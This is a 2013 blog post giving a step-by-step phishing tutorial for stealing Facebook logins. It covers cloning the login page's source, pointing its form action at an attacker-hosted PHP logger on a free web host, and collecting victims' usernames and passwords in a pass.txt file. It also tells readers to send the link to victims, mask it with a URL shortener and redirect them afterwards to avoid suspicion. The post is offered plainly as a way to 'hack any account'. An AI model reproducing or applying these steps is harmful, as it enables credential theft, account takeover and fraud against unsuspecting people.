Thursday, July 18, 2013

Hack any account using phishing

1:35 PM    No comments

PHISHING :
Phishing is the act of attempting to acquire information such as user names, passwords, and credit card details (and sometimes, indirectly, money).

 STEPS:

1. To upload our php file to a free web hosting site.
2. Prepare our fake phishing page.
3. Upload our fake phishing page to free web hosting site.
4. Send the phishing link to poor victims.
    Done! As soon as he enters his username and password, it will be stored in a text file. This text file 
    can be found in our web hosting account.

 Step 1 :
Sign up on any free web hosting site like my3gb.com.
Log in. Now go to "file manager"
Download this zip file and extract it.. It contains example.php file.
Upload this php file to your my3gb account.


Step 2 : 
Open the website of which you want to make fake login page. Let's take facebook.com as an example. Now right click on any blank area then click on "view page source".

A new tab will open in your browser containing lots of codes!
Copy all the codes by pressing keys ctrl+a then ctrl+c.
Open notepad and paste ctrl+v  (for noobs :D)
Press ctrl+f  to find the string "action="
Do note that the direction is up in the Find Window
(See screenshots)




You will find this :
action="https://www.facebook.com/login.php?login_attempt=1"
Now remove https://www.facebook.com/login.php?login_attempt=1
and replace it by our fake login page link.
(Copy the fake login page link by right click on the example.php that we have uploaded in my3gb account, see screenshot 1)
Now it will look like this :
action="http://ur.username.my3gb.com/example.php"

 Now Click on
File>>save as
save it as example.html 

step 3 :
Upload this example.html to your my3gb account.



step 4 :
Copy the link address of example.html then send it to victims. Done!
As soon as the victim clicks on our link our fake facebook login page will open. When he enters his credentials it will be stored in a text file named "pass.txt". Then he will be redirected to facebook video calling page. You can find pass.txt file in your my3gb account.

 You can mask the url means  you can hide the url using google url shortner.(goo.gl)
Also you can change the redirection url by editing the example.php file.
Any doubts? Please mention it in comments.



0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)